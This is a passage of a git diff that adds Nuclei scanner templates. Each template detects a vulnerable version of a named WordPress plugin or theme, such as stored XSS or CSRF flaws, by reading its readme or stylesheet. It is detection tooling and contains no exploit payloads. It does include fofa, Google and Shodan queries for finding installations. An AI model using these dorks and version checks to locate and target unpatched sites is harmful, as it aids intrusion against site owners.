+ - compare_versions(version, '<= 1.0.14')
\ No newline at end of file
diff --git a/poc/other/meeting-scheduler-by-vcita-7c52a014cce8f41b194342f08ceede41.yaml b/poc/other/meeting-scheduler-by-vcita-7c52a014cce8f41b194342f08ceede41.yaml
new file mode 100644
index 0000000000..f727cc5bbb
--- /dev/null
+++ b/poc/other/meeting-scheduler-by-vcita-7c52a014cce8f41b194342f08ceede41.yaml
@@ -0,0 +1,59 @@
+id: meeting-scheduler-by-vcita-7c52a014cce8f41b194342f08ceede41
+
+info:
+ name: >
+ Online Booking & Scheduling Calendar for WordPress by vcita <= 4.5.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/963c2d10-692b-4447-8d0b-7ccc2e533f01?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/"
+ google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "meeting-scheduler-by-vcita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.5.1')
\ No newline at end of file
diff --git a/poc/other/mins-to-read-2941ea333622216e1c6091029b0b178a.yaml b/poc/other/mins-to-read-2941ea333622216e1c6091029b0b178a.yaml
new file mode 100644
index 0000000000..d586751fa2
--- /dev/null
+++ b/poc/other/mins-to-read-2941ea333622216e1c6091029b0b178a.yaml
@@ -0,0 +1,59 @@
+id: mins-to-read-2941ea333622216e1c6091029b0b178a
+
+info:
+ name: >
+ Mins To Read <= 1.2.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5a595e05-c017-4f6a-995d-a6226c5a19b1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mins-to-read/"
+ google-query: inurl:"/wp-content/plugins/mins-to-read/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mins-to-read,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mins-to-read/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mins-to-read"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.2')
\ No newline at end of file
diff --git a/poc/other/newsmash-6377f947dc4cbd6377b900e7b2a109af.yaml b/poc/other/newsmash-6377f947dc4cbd6377b900e7b2a109af.yaml
new file mode 100644
index 0000000000..60428d9ce2
--- /dev/null
+++ b/poc/other/newsmash-6377f947dc4cbd6377b900e7b2a109af.yaml
@@ -0,0 +1,59 @@
+id: newsmash-6377f947dc4cbd6377b900e7b2a109af
+
+info:
+ name: >
+ NewsMash <= 1.0.71 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bb30dac-e0f3-43dd-a20d-9af6c7af3cb4?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/newsmash/"
+ google-query: inurl:"/wp-content/themes/newsmash/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,newsmash,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/newsmash/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newsmash"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.71')
\ No newline at end of file
diff --git a/poc/other/newsmunch.yaml b/poc/other/newsmunch.yaml
new file mode 100644
index 0000000000..5a16dbba03
--- /dev/null
+++ b/poc/other/newsmunch.yaml
@@ -0,0 +1,59 @@
+id: newsmunch
+
+info:
+ name: >
+ NewsMunch <= 1.0.35 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a2b0ff4-9471-4fd0-ac1a-ed5b7b4af4ff?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/newsmunch/"
+ google-query: inurl:"/wp-content/themes/newsmunch/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,newsmunch,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/newsmunch/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newsmunch"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.35')
\ No newline at end of file
diff --git a/poc/other/onlyoffice-b402953c76f82d1b88842a9ee0c31f2f.yaml b/poc/other/onlyoffice-b402953c76f82d1b88842a9ee0c31f2f.yaml
new file mode 100644
index 0000000000..8e2daec677
--- /dev/null
+++ b/poc/other/onlyoffice-b402953c76f82d1b88842a9ee0c31f2f.yaml
@@ -0,0 +1,59 @@
+id: onlyoffice-b402953c76f82d1b88842a9ee0c31f2f
+
+info:
+ name: >
+ ONLYOFFICE Docs <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/80b71264-5b0f-41cb-86c1-a052d1976597?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/onlyoffice/"
+ google-query: inurl:"/wp-content/plugins/onlyoffice/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,onlyoffice,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/onlyoffice/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "onlyoffice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.0')
\ No newline at end of file
diff --git a/poc/other/photo-video-store-9887b9e8aa29c789cc721ef3d676a573.yaml b/poc/other/photo-video-store-9887b9e8aa29c789cc721ef3d676a573.yaml
new file mode 100644
index 0000000000..ff9bd8723e
--- /dev/null
+++ b/poc/other/photo-video-store-9887b9e8aa29c789cc721ef3d676a573.yaml
@@ -0,0 +1,59 @@
+id: photo-video-store-9887b9e8aa29c789cc721ef3d676a573
+
+info:
+ name: >
+ Photo Video Store <= 21.07 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/202c22f1-48ce-4724-be5f-dece2a6f9adb?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/photo-video-store/"
+ google-query: inurl:"/wp-content/plugins/photo-video-store/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,photo-video-store,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/photo-video-store/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "photo-video-store"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 21.07')
\ No newline at end of file
diff --git a/poc/other/pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa.yaml b/poc/other/pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa.yaml
new file mode 100644
index 0000000000..f784700196
--- /dev/null
+++ b/poc/other/pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa.yaml
@@ -0,0 +1,59 @@
+id: pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa
+
+info:
+ name: >
+ Pixobe Cartography <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c6949f9-316c-4e48-a77a-ace793d329ac?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/pixobe-cartography/"
+ google-query: inurl:"/wp-content/plugins/pixobe-cartography/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,pixobe-cartography,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pixobe-cartography/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pixobe-cartography"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/other/plugin-951ffa4455cde2cf84338c23f5961c7d.yaml b/poc/other/plugin-951ffa4455cde2cf84338c23f5961c7d.yaml
new file mode 100644
index 0000000000..f4ee5fc613
--- /dev/null
+++ b/poc/other/plugin-951ffa4455cde2cf84338c23f5961c7d.yaml
@@ -0,0 +1,59 @@
+id: plugin-951ffa4455cde2cf84338c23f5961c7d
+
+info:
+ name: >
+ WP Revisions Manager <= 1.0.2 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/96a5db79-a88d-4c1f-9da4-6dd3120ff85e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/Plugin/"
+ google-query: inurl:"/wp-content/plugins/Plugin/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,Plugin,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/Plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/other/post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a.yaml b/poc/other/post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a.yaml
new file mode 100644
index 0000000000..76c220a48c
--- /dev/null
+++ b/poc/other/post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a.yaml
@@ -0,0 +1,59 @@
+id: post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a
+
+info:
+ name: >
+ Post Carousel Slider for Elementor <= 1.4.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c205041a-01c9-44cd-8270-dafae2a78cbf?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/post-carousel-slider-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/post-carousel-slider-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,post-carousel-slider-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/post-carousel-slider-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "post-carousel-slider-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/other/powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582.yaml b/poc/other/powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582.yaml
new file mode 100644
index 0000000000..3e4246dec5
--- /dev/null
+++ b/poc/other/powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582.yaml
@@ -0,0 +1,59 @@
+id: powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582
+
+info:
+ name: >
+ PowerPack Elementor Addons (Free Widgets, Extensions and Templates) <= 2.8.1 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d073d9df-0636-4884-b5d0-e2da779e5edf?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/powerpack-lite-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/powerpack-lite-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,powerpack-lite-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/powerpack-lite-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "powerpack-lite-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.1')
\ No newline at end of file
diff --git a/poc/other/pubnews-5b335bb90b570f570873fbfa38b47c5b.yaml b/poc/other/pubnews-5b335bb90b570f570873fbfa38b47c5b.yaml
new file mode 100644
index 0000000000..a1b6b36e68
--- /dev/null
+++ b/poc/other/pubnews-5b335bb90b570f570873fbfa38b47c5b.yaml
@@ -0,0 +1,59 @@
+id: pubnews-5b335bb90b570f570873fbfa38b47c5b
+
+info:
+ name: >
+ Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7eaa0117-5320-431f-b3d2-05a867901528?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/pubnews/"
+ google-query: inurl:"/wp-content/themes/pubnews/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,pubnews,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/pubnews/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pubnews"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.7')
\ No newline at end of file
diff --git a/poc/other/random-banner-0b21c7eea2233a52fab8c4a62c453192.yaml b/poc/other/random-banner-0b21c7eea2233a52fab8c4a62c453192.yaml
new file mode 100644
index 0000000000..a05ab1db45
--- /dev/null
+++ b/poc/other/random-banner-0b21c7eea2233a52fab8c4a62c453192.yaml
@@ -0,0 +1,59 @@
+id: random-banner-0b21c7eea2233a52fab8c4a62c453192
+
+info:
+ name: >
+ Random Banner <= 4.2.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/32369351-ddae-452f-b286-6478deab5a97?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/random-banner/"
+ google-query: inurl:"/wp-content/plugins/random-banner/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,random-banner,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/random-banner/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "random-banner"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.2.9')
\ No newline at end of file
diff --git a/poc/other/rccp-free-addabdad3f0edc1afcad78dcfe322e09.yaml b/poc/other/rccp-free-addabdad3f0edc1afcad78dcfe322e09.yaml
new file mode 100644
index 0000000000..023236a3f3
--- /dev/null
+++ b/poc/other/rccp-free-addabdad3f0edc1afcad78dcfe322e09.yaml
@@ -0,0 +1,59 @@
+id: rccp-free-addabdad3f0edc1afcad78dcfe322e09
+
+info:
+ name: >
+ RingCentral Communications <= 1.6.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/de4ba999-3312-4bcc-ab87-574b7994e07e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/rccp-free/"
+ google-query: inurl:"/wp-content/plugins/rccp-free/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,rccp-free,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/rccp-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "rccp-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.1')
\ No newline at end of file
diff --git a/poc/other/simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7.yaml b/poc/other/simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7.yaml
new file mode 100644
index 0000000000..0404fba6da
--- /dev/null
+++ b/poc/other/simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7.yaml
@@ -0,0 +1,59 @@
+id: simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7
+
+info:
+ name: >
+ Simple Popup <= 4.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e993667f-8275-4078-afd5-b26ff8528ab4?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/simple-popup-plugin/"
+ google-query: inurl:"/wp-content/plugins/simple-popup-plugin/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,simple-popup-plugin,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-popup-plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-popup-plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.6')
\ No newline at end of file
diff --git a/poc/other/simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d.yaml b/poc/other/simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d.yaml
new file mode 100644
index 0000000000..5545067088
--- /dev/null
+++ b/poc/other/simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d.yaml
@@ -0,0 +1,59 @@
+id: simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d
+
+info:
+ name: >
+ SimpleSchema <= 1.7.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/81500371-93d3-4cee-a992-93d2469f5233?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/simpleschema-free/"
+ google-query: inurl:"/wp-content/plugins/simpleschema-free/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,simpleschema-free,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simpleschema-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simpleschema-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.6.9')
\ No newline at end of file
diff --git a/poc/other/skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003.yaml b/poc/other/skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003.yaml
new file mode 100644
index 0000000000..548c8b7269
--- /dev/null
+++ b/poc/other/skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003.yaml
@@ -0,0 +1,59 @@
+id: skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003
+
+info:
+ name: >
+ Elementor Image Gallery Plugin <= 1.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/52a094b0-acee-412a-ad15-38c9f4510c48?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/skyboot-portfolio-gallery/"
+ google-query: inurl:"/wp-content/plugins/skyboot-portfolio-gallery/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,skyboot-portfolio-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/skyboot-portfolio-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "skyboot-portfolio-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.3')
\ No newline at end of file
diff --git a/poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml b/poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml
new file mode 100644
index 0000000000..ddc09ecc52
--- /dev/null
+++ b/poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml
@@ -0,0 +1,59 @@
+id: smart-popup-blaster-30df007059118a37ebbef148c110f5c7
+
+info:
+ name: >
+ Smart PopUp Blaster <= 1.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e10f391a-6663-4222-8266-ab911c588b76?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/smart-popup-blaster/"
+ google-query: inurl:"/wp-content/plugins/smart-popup-blaster/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,smart-popup-blaster,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smart-popup-blaster/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smart-popup-blaster"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.3')
\ No newline at end of file
diff --git a/poc/other/softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06.yaml b/poc/other/softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06.yaml
new file mode 100644
index 0000000000..98d4bda3f2
--- /dev/null
+++ b/poc/other/softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06.yaml
@@ -0,0 +1,59 @@
+id: softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06
+
+info:
+ name: >
